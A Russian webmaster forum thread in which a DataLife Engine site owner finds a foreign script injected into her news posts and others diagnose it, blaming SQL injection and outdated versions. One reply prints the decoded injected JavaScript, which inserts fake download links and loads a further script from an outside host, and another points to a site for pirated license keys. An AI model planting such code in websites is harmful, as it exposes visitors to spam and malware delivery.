X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Не пойму что за атака?
LimmiFox
LimmiFox
Topic Starter сообщение 31.1.2012, 23:19; Ответить: LimmiFox
Сообщение #1


Частый гость
**

Группа: User
Сообщений: 74
Регистрация: 28.2.2011
Из: Canada
Поблагодарили: 19 раз
Репутация:   7  


Есть у меня хороший сайт, новостной на dle. Нравится он мне, для души пишу на нем.

И вот сегодня чисто случайно заглянула в одну из старых новостей и увидела что в конце новости такой вот скриптик: <script type="text/javascript" src="http://rapidashare-parking.ru/id68905.js"></script>

Смотрю другие новости - везде такое. Умом понимаю, что кто - то что - то мне залил, но не пойму что это, зачем и как... Подкиньте мне пару умных мыслей, плиззз... wub.gif

Сообщение отредактировал LimmiFox - 31.1.2012, 23:22
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shansick
shansick
сообщение 31.1.2012, 23:26; Ответить: shansick
Сообщение #2


Завсегдатай
*****

Группа: Active User
Сообщений: 641
Регистрация: 3.10.2008
Из: Россия
Поблагодарили: 241 раз
Репутация:   42  


Это полюбому SQL инекция. Других вариантов такой хни... в моей практике нету! Все время заливали либо JS левый либо ссылки в новости только через инекции!

P.S. Смотрите дыры в левых модулях установленных, если таких нету то это опять какая то дыра в ДЛЕ! Напишите версию!

Сообщение отредактировал shansick - 31.1.2012, 23:27
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LimmiFox
LimmiFox
Topic Starter сообщение 31.1.2012, 23:31; Ответить: LimmiFox
Сообщение #3


Частый гость
**

Группа: User
Сообщений: 74
Регистрация: 28.2.2011
Из: Canada
Поблагодарили: 19 раз
Репутация:   7  


(shansick @ 31.1.2012, 23:26) *
Это полюбому SQL инекция. Других вариантов такой хни... в моей практике нету! Все время заливали либо JS левый либо ссылки в новости только через инекции!

P.S. Смотрите дыры в левых модулях установленных, если таких нету то это опять какая то дыра в ДЛЕ! Напишите версию!


Версия 9.2 лицензия. Был модуль переходов, от него однажды получила кучу ссылок спрятанных в новости, после того случая все удалила и все почистила.

Сейчас левых модулей нет.

P.S учитывая тот факт, что поисковики упорно молчат про этот скрипт, то походу я единственный счастливчик, который подхватил эту хрень... Хоть в чем - то я первая f_4866c2c501a2c.gif

Сообщение отредактировал LimmiFox - 31.1.2012, 23:37


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shansick
shansick
сообщение 31.1.2012, 23:37; Ответить: shansick
Сообщение #4


Завсегдатай
*****

Группа: Active User
Сообщений: 641
Регистрация: 3.10.2008
Из: Россия
Поблагодарили: 241 раз
Репутация:   42  


(LimmiFox @ 31.1.2012, 22:31) *
Версия 9.2 лицензия.

Срочно обновитесь до актуальной, хотя бы до 9.4 + почитайте на офф сайте о всех дырах и закройте их. Тут еще играет роль если этот код просто засунули в шаблон полной новости то тогда где то у вас шел есть, если все файлы чисты то тогда только инъекция...

P.S. Щас прошерстил выдачу, нигде эта JS дрянь не встречалась даже в индексе выдачи вашего сайта. Так что вы правы вы первая кто удостоился чести поймать эту заразу!

Сообщение отредактировал shansick - 31.1.2012, 23:41
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LimmiFox
LimmiFox
Topic Starter сообщение 31.1.2012, 23:41; Ответить: LimmiFox
Сообщение #5


Частый гость
**

Группа: User
Сообщений: 74
Регистрация: 28.2.2011
Из: Canada
Поблагодарили: 19 раз
Репутация:   7  


(shansick @ 31.1.2012, 23:37) *
Срочно обновитесь до актуальной, хотя бы до 9.4 + почитайте на офф сайте о всех дырах и закройте их. Тут еще играет роль если этот код просто засунули в шаблон полной новости то тогда где то у вас шел есть, если все файлы чисты то тогда только инъекция...



Проблема в том, что для актуальной версии нет нормального лича, поэтому я сижу на 9.2 Дыры вроде как полатала еще в самом начале. Естьу меня еще один сайт на этой же версии дле, там все нормально.

Ладно, смотрю пока и пытаюсь понять как засунули....

P.S жалко, что за первенство ничего хорошего не присуждают wink.gif

Сообщение отредактировал LimmiFox - 31.1.2012, 23:42
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shansick
shansick
сообщение 31.1.2012, 23:45; Ответить: shansick
Сообщение #6


Завсегдатай
*****

Группа: Active User
Сообщений: 641
Регистрация: 3.10.2008
Из: Россия
Поблагодарили: 241 раз
Репутация:   42  


Могу дать вам ссыль на архив хеш совпадает с офф сайтом, дальше просто топаете на dlekey.cn там получаете свой код и юзаете в свое удовольствие!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LimmiFox
LimmiFox
Topic Starter сообщение 31.1.2012, 23:52; Ответить: LimmiFox
Сообщение #7


Частый гость
**

Группа: User
Сообщений: 74
Регистрация: 28.2.2011
Из: Canada
Поблагодарили: 19 раз
Репутация:   7  


(shansick @ 31.1.2012, 23:45) *
Могу дать вам ссыль на архив хеш совпадает с офф сайтом, дальше просто топаете на dlekey.cn там получаете свой код и юзаете в свое удовольствие!


Дык у меня лицензия, кей есть. Пока не хочу менять версию дле. Но если именно в этом причина - то придется. Пока разбираюсь.

Код скрипта еще и зашифрован был, вроде его расшифровала, но к сожалению мозгов не хватает, чтобы понять, что он делает... То ли он кого - то продвигает, то ли он мне гадит...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 31.1.2012, 23:58; Ответить: House
Сообщение #8


Завсегдатай
*****


Группа: Banned
Сообщений: 628
Регистрация: 2.11.2011
Из: Саранск
Поблагодарили: 154 раза
Репутация:   19  


Если дадите url сайта и названия плагинов, возможно найду sql-инъекцию, если будет время.

Что делает ваш скрипт? Хм.. За это мне люди деньги платят...
document.write(unescape("<script type="text/javascript">
BCB = {};
BCB.r_tds = false;
BCB.f_tds = false;
BCB.a_s = false;
BCB.ses = [
[/google\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/search\.yahoo\./i, /(\?|&)p=(.*?)(&|$)/i, 2],
[/bing\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/search\.aol\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2],
[/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2],
[/(nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/i, 2],
[/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2]
];
BCB.BCB = function(ref) {
var q=null;

for(var i=0; i<BCB.ses.length; i++) {
var se = BCB.ses[i];
if (ref.match(se[0])) {
q = ref.match(se[1]);
if (q) q = q[se[2]];
break;
}
}

var referer="Y";
if (referer=="N") {
q=document.title;

}

if (q) {

q=document.title;
var q_array = q.split(" »");
var q = q_array[0];

var c_url='http://rapidsshare.uni.me/?wkey=68905&query='+(encodeURIComponent(q));

document.write('<style>.module-one-search img {display:block;}.module-one-search {height:112px;margin:6px;font:bold 16px Arial;background:#fefefe url(http://img291.imageshack.us/img291/3307/blbg.gif) repeat-y 100% 0;border:1px solid #fefefe;border:1px solid #ccc;}.module-one-search a {color:#007ecb;}.module-one-search span {display:block;color:#464646;font:12px Arial;text-transform:uppercase;}.module-one-search .module-bg {height:72px;padding:40px 100px 0 131px;background:url(http://img19.imageshack.us/img19/9311/blbgl.gif) no-repeat 14px 16px;}</style><div class="module-one-search"><div class="module-bg">Скачать <a href="'+c_url+'" target="_blank"><b>'+q+'</b></a> прямая ссылка</div></div>');//e
}
};
BCB.BCB(document.referrer);
</script><script type="text/javascript" src="http://mobileeasier.ce.ms/r.php?go=http://mobileeasier.ce.ms/jar/%3Ff%3D4361%26m%3D0"></script>"))
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shansick
shansick
сообщение 1.2.2012, 0:02; Ответить: shansick
Сообщение #9


Завсегдатай
*****

Группа: Active User
Сообщений: 641
Регистрация: 3.10.2008
Из: Россия
Поблагодарили: 241 раз
Репутация:   42  


я так понял вы расшифровали тот JS скрипт?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LimmiFox
LimmiFox
Topic Starter сообщение 1.2.2012, 0:09; Ответить: LimmiFox
Сообщение #10


Частый гость
**

Группа: User
Сообщений: 74
Регистрация: 28.2.2011
Из: Canada
Поблагодарили: 19 раз
Репутация:   7  


(House @ 31.1.2012, 23:58) *
Если дадите url сайта и названия плагинов, возможно найду sql-инъекцию, если будет время.

Что делает ваш скрипт? Хм.. За это мне люди деньги платят...


Скинула в личку...

Хм...или Вы - маг и волшебник, или я балда... именно эта лабуда в коде...


(shansick @ 1.2.2012, 0:02) *
я так понял вы расшифровали тот JS скрипт?


А вон выше, House код написал. Таки я понимаю, что кто - то себя раскручивает...

Сообщение отредактировал LimmiFox - 1.2.2012, 0:10
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Что делать если боты и поисковики грузят сервер?
Превышение нагрузки на сервер.
8 nahalturu 2290 Сегодня, 17:12
автор: vds4you
Открытая тема (нет новых ответов) Adsense: много кликов, мало денег. Что делать?
Очень дешёвые клики по объявлениям
16 zeleboba 2418 Сегодня, 17:00
автор: vds4you
Открытая тема (нет новых ответов) Пошив одежды - что не так с сайтом ?
18 bridge8 1249 Сегодня, 14:01
автор: bridge8
Открытая тема (нет новых ответов) [Бесплатный тест] Airsocks. Инновационные мобильные 4G / LTE прокси. Забудь все что было раньше!
26 airsocks11 6105 Вчера, 22:41
автор: airsocks11
Горячая тема (нет новых ответов) Что лучше, фриланс, удаленка, или работа в офисе солидной компании?
95 Levizar 7724 Вчера, 21:57
автор: Зотов


 



RSS Текстовая версия Сейчас: 13.12.2017, 23:19
Дизайн